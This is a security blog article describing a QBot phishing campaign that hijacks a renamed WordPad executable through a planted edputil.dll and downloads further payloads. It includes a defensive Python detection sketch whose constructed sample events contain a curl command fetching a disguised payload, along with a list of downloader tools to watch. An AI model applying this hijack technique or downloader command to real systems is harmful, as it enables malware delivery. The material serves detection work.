New QBot Malware Campaign Exploits WordPad for Infection
Phishing, DLL Hijacking and Lateral Movement, Among the Attack Techniques.
Last updated on June 2, 2023
A recent QBot malware campaign has been observed abusing a DLL search-order hijacking weakness in the Windows WordPad application to slip past security controls. Abusing legitimate Windows programs in this way is an increasingly common tactic among threat actors.
According to ProxyLife, a cybersecurity researcher and member of the Cryptolaemus group, the newly discovered QBot phishing campaign abuses a DLL hijacking flaw in the WordPad executable, write[.]exe.
It Starts with Phishing
The attack starts with phishing emails that trick recipients into clicking a link. When the link is clicked, a ZIP file with a random name is downloaded from a remote server.
The ZIP archive contains two files: document[.]exe, which is a renamed copy of the legitimate WordPad executable write[.]exe, and edputil[.]dll, the DLL used for the hijack.
Once Executed, the DLL Hijacking Begins
When document[.]exe is executed, it attempts to load a legitimate Windows DLL named edputil[.]dll, whose genuine copy normally lives in C:\Windows\System32.
Because Windows resolves a DLL requested by name by searching the application's own directory before System32, the executable finds the attacker's edputil[.]dll, which was extracted from the archive into the same folder as document[.]exe, and loads it in place of the real one.
With the malicious DLL now running inside the trusted WordPad process, it uses curl[.]exe to download a further DLL from a remote server, disguised as a PNG file. That second DLL launches the QBot malware.
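As an added example (not code from the article or from the researchers it cites), the following Python sketch shows what a detection for this chain has to correlate: a process whose PE OriginalFileName (WRITE.EXE) disagrees with its on-disk name, an image load of a System32-resident DLL name that was resolved from the executable's own folder, and a curl.exe child of that same process. Event field names follow Sysmon's process-create (Event ID 1) and image-load (Event ID 7) events; the sample events, file paths, process IDs and the example.invalid URL are constructed for illustration, and the list of System32 DLL names is a deliberately short stand-in for a real inventory.

```python
"""Detection sketch for the renamed-write.exe / edputil.dll hijack chain.

Added example, not the article's or the researchers' code. Assumptions: events are
Sysmon-style dicts (Event ID 1 process create, Event ID 7 image load); all sample
telemetry below is constructed, not captured.
"""
from __future__ import annotations

from collections import defaultdict
from pathlib import PureWindowsPath

SYSTEM32 = PureWindowsPath(r"C:\Windows\System32")

# Names of DLLs that live in System32. If one of these is resolved from anywhere else,
# the application directory has almost certainly been used to plant it.
# Constructed, intentionally short list; edputil.dll is the one named in the article.
SYSTEM32_DLLS = {"edputil.dll", "kernel32.dll", "user32.dll", "ntdll.dll"}

# Living-off-the-land downloaders worth correlating as children of a hijacked process.
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe"}

# Constructed sample telemetry modelled on the chain described in the article.
SAMPLE_EVENTS = [
    # 1. The renamed WordPad executable starts from the extracted ZIP folder.
    {"EventID": 1, "ProcessId": 4120, "ParentProcessId": 1204,
     "Image": r"C:\Users\victim\Downloads\a8f3k\document.exe",
     "OriginalFileName": "WRITE.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Users\victim\Downloads\a8f3k\document.exe"},
    # 2. It resolves edputil.dll from its own folder instead of System32 (the hijack).
    {"EventID": 7, "ProcessId": 4120,
     "Image": r"C:\Users\victim\Downloads\a8f3k\document.exe",
     "ImageLoaded": r"C:\Users\victim\Downloads\a8f3k\edputil.dll"},
    # 3. A normal dependency resolved correctly from System32: must not fire.
    {"EventID": 7, "ProcessId": 4120,
     "Image": r"C:\Users\victim\Downloads\a8f3k\document.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll"},
    # 4. The planted DLL uses curl.exe to fetch the next stage disguised as a PNG.
    {"EventID": 1, "ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "ParentImage": r"C:\Users\victim\Downloads\a8f3k\document.exe",
     "CommandLine": r"curl.exe -o C:\Users\victim\AppData\Local\Temp\img.png http://example.invalid/img.png"},
    # 5./6. Benign control: the real WordPad loading the real edputil.dll.
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 1204,
     "Image": r"C:\Windows\System32\write.exe", "OriginalFileName": "WRITE.EXE",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "write.exe"},
    {"EventID": 7, "ProcessId": 5000,
     "Image": r"C:\Windows\System32\write.exe",
     "ImageLoaded": r"C:\Windows\System32\edputil.dll"},
]


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _parent_dir(path: str) -> PureWindowsPath:
    return PureWindowsPath(path).parent


def renamed_system_binary(ev: dict) -> bool:
    """Process-create event whose PE OriginalFileName disagrees with the on-disk name
    (document.exe carrying WRITE.EXE in its version resource)."""
    if ev["EventID"] != 1 or not ev.get("OriginalFileName"):
        return False
    return ev["OriginalFileName"].lower() != _name(ev["Image"])


def planted_system_dll(ev: dict) -> bool:
    """Image-load event for a System32-resident DLL name that was resolved outside
    System32, from the loading executable's own directory: the search-order hijack."""
    if ev["EventID"] != 7 or _name(ev["ImageLoaded"]) not in SYSTEM32_DLLS:
        return False
    dll_dir = _parent_dir(ev["ImageLoaded"])  # PureWindowsPath compares case-insensitively
    return dll_dir != SYSTEM32 and dll_dir == _parent_dir(ev["Image"])


def downloader_child(ev: dict) -> bool:
    """Process-create event for a built-in downloader such as curl.exe."""
    return ev["EventID"] == 1 and _name(ev["Image"]) in DOWNLOADERS


def detect(events: list[dict]) -> dict[int, set[str]]:
    """Correlate the indicators per process id. A process is reported only when the
    hijack itself (planted DLL) is seen together with at least one other indicator."""
    indicators: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        if renamed_system_binary(ev):
            indicators[ev["ProcessId"]].add("renamed-system-binary")
        if planted_system_dll(ev):
            indicators[ev["ProcessId"]].add("planted-system32-dll")
        if downloader_child(ev):
            # Attribute the download to the parent that spawned the downloader.
            indicators[ev["ParentProcessId"]].add("spawned-downloader:" + _name(ev["Image"]))
    return {pid: inds for pid, inds in indicators.items()
            if "planted-system32-dll" in inds and len(inds) > 1}


if __name__ == "__main__":
    for pid, inds in detect(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(sorted(inds))}")
```

The planted-DLL rule is the discriminator that matters: the genuine WordPad loading edputil.dll from System32 (the control events) produces no alert, while the same DLL name resolved from the application directory does, whatever the executable has been renamed to. The renamed-binary and downloader-child indicators are supporting evidence that cut false positives from software that legitimately ships its own copies of system DLLs. In production the SYSTEM32_DLLS set would be built from a clean reference system rather than hard-coded.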
Post Infection Behaviour
While running in the background, QBot harvests emails to seed further phishing campaigns and downloads additional payloads such as Cobalt Strike, a post-exploitation toolkit that attackers use to move laterally and maintain access once they are inside a network.
According to Cyware, abusing the Windows 10 WordPad executable is consistent with tactics the QBot operators have used before. Its ability to hide behind legitimate Windows programs and spread laterally makes it a particularly dangerous threat.
Madalina, a seasoned digital content creator at Heimdal®, blends her passion for cybersecurity with an 8-year background in PR & CSR consultancy. Skilled in making complex cyber topics accessible, she bridges the gap between cyber experts and the wider audience with finesse.